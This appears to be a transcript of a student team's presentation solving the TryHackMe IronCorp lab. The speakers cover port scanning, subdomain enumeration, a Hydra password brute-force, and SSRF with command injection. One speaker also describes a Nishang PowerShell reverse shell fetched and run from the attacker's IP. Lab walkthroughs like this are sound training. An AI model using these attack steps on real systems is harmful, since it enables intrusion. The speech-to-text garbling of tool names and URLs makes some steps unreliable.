Hi guys, my name is V. Colin. For this pen test 2, I'm answering question number 1 and 2. So for question number 1, tools used to do were try hack me attack box and terminal. The methods are after launching the try hack me attack box, I started the machine on my laptop. Then I click the terminal and open etc/host file by using nano and added in ironcorp.me. And then I executed the nmap command and revealed all the ports open inside to scan the INCOP.me server. Lastly, I gets to see the first open port here, which is port 53. So for question number 2, the answer is admin. Tools used to do in this question are attacks box and terminal. The methods are I access port 8080 and examine it, and then I accessed port 11025 and it did not have any information like port 8080. So I opened the nmap again and took out port 53 and I looked it up and discovered two subdomains. Finally, I get to see the first subdomain of ironcorp.me, which is admin. So now I would like to pass to Sashwin. That's all from me. Thank you.
Hi sir, I'm Shashwina Suresh Kumar. I'm from DENEB and I'll be doing question 3 and 4 from IronCorp. Question 3. What is the second subdomain of IronCorp.me? The tool I used here is THM attack box and terminal. On the right side, we can see the screenshot of the terminal. After founding the servers, I typed in execute nmap. The nmap is stated in the second line. We access the web service of port 8080 and have the control panel. We examine, but there is no functionality that can serve us. Based on the question, we found out first and second subdomain. The second subdomain is internal. I've put in the arrow so we can see it easily. Move on to question 4. Question 4. What is the admin password? The tools I used here: THM attack box, 10,000 password GitHub, and terminal. On the right side, we can see port 11025's website. We access the web service of port 11025 and we have the same problem. Another website that also does not contain information or functionalities that can help us to climb into the system. Let's remember the nmap took out the open port 53. Let's see if with dig we can list any subdomain or information that is relevant to us. Found out two subdomains that are running internally. We cannot access one of them, so we understand that these resources is only exposed internally. We tried the other subdomain and see that it loads protected area with basic authentication. This is the admin incorp me 11025's web. Here I used GitHub as a dictionary with 10,000 most used password around the world. Hydra. Hydra is a tool to guess or crack valid login or password pairs. Here I use Hydra to find the admin's password using Daniel Missler seg list to find out top random password used. As you can see, I have found out admin password and the answer for question 4. The answer is password 123. Thank you, sir. Next, I'll pass to Ashwin for question 4 and 5. 5 and 6.
Okay, thank you, Shashwin. Hi, sir. I am Ashwin, and I was assigned to answer the question 5 and 6 for the Iron Corp pen test. To start up, question 5 ask me to find the name of the directory of user.txt. To start up in the subdomain in which Shashwin found the credential when logging in, it shows me a page that contains an input to perform queries. I typed a test in the query bar. In the top left corner. After doing that and hitting the submit query button, the web page refreshed by its own and a new URL is now visible in the search bar of the browser. The link was as follows: http://admin.incorp.me ::11:025/r equal test hash. After that, I tried to change the query to other random query to see if it reveals any possible leads and replace the test hash with http://internal.incorp.me ::11:025 hash slash. This opens a new refresh page with a text that says you can find your name here at the top left corner of the website. I inspected the specific page source and found a unique link which was http://internal.incorp.me ::11:025/name.php (name equal). This could help me find the secret name that would lead us to the next step. Then I return to the previous page and add the name.php (name equals) at the back of the URL. As expected, the name Equinox appears when the page is loaded. I inspected the page and found a line which said my name is Equinox. I edited the search bar by adding straight line dir. This revealed a list of directories. After that, I created a new directory for Equinox. I went back to the attack box terminal and created a new directory called shell.ps1 with reverse shell added inside it. Then I opened burp suite in order to add in shell.ps1 as the new directory for Equinox. After the proxy was able to intercept and gain the website's data from its server, add http://internal.incorp.me ::11:025/name.php :name equals Equinox straight line dir after r equal and send it to the repeater to make sure it was able to give a response. We tried to run the code on the burp suite with command injection using shell skip. We managed to get who am I running and see that user has super user permission. We use one of the shells that Nishang has invoked, PowerShell TCP.ps1 in our invoke PowerShell TCP.ps1 file. We add the following line at the end of the file to execute our reverse shell when it is downloaded with the IP and the port to which it goes to connect. The command that we are going to execute in the machine is the following to execute our shell: PowerShell.exe-c IEX new object net.web client download string http our IP address, which is 10.10.188.165 invoke PowerShell.ps1. For some reason it does not accept spaces and we have to code our command twice for it to execute. We run and manage to get our shells. To find our files, we can run the croot. Then the dir command is used to display all the files in our shell. We can input the user arrow dir to display all the users. Run through all the files. So after I run through, I found that the immediate directory that contains user.txt is users/administrator/desktop. So the answer for question 6 is desktop. To answer question 6, which was to find the directory which contains root.txt file, the steps are similar as I did previously, just by entering the users/superadmin/desktop directory. I found the root.txt file. So the answer for question 6 is desktop also. Thank you. I will now pass it on to Abdu to answer question 7 and 8.
Hello, sir. My name is Samsol Shasot. I'm a member of Group DENEB. So today I have to do some questions, which is question 7 and question 8. It's supposed to in THM iron crop. So first of all, I use some tools which is THM text box and map, geek and Ghidra. So thought process and methodology. And after I use it, after I'm done to use it, nano, and I was used the map, and you can see from here the result of the map, and it was took few minutes to successfully log in. So after map, and I was search on Google admin.ironcorp.me uh, 88 port web, and you can see the result from here. So after that, I just search admin.ironcorp.me 11025 port web result, which you can see from here, and it's almost same thing as the port 8080. After that, 53 for remember for the map result on port 53, use it with the dig tools. We can get any subdomains or information that may relevant. We just found two subdomains that run internal, so you can see how I was use the dig tools here, and the result is here also. And after that, I just go into admin.ironcrop.me 11025 ports, and here you can see, and one of the this is one of the subdomain was protected and needed to username and password to open it, and so I was used to find the password and username, 10,000 passwords and Ghidra, and you can see here the 10,000 passwords, the link and the results, and so here is how I was used the Ghidra. You can see from here successfully login, and as from here you can see the login and password, and the password is password123. The username is the login is admin. So after that we just fill up the username and passwords required place, and so we can go to this page, and after that we just stop because I don't have any idea what to do. Thanks for watching us. That's all what I have to do.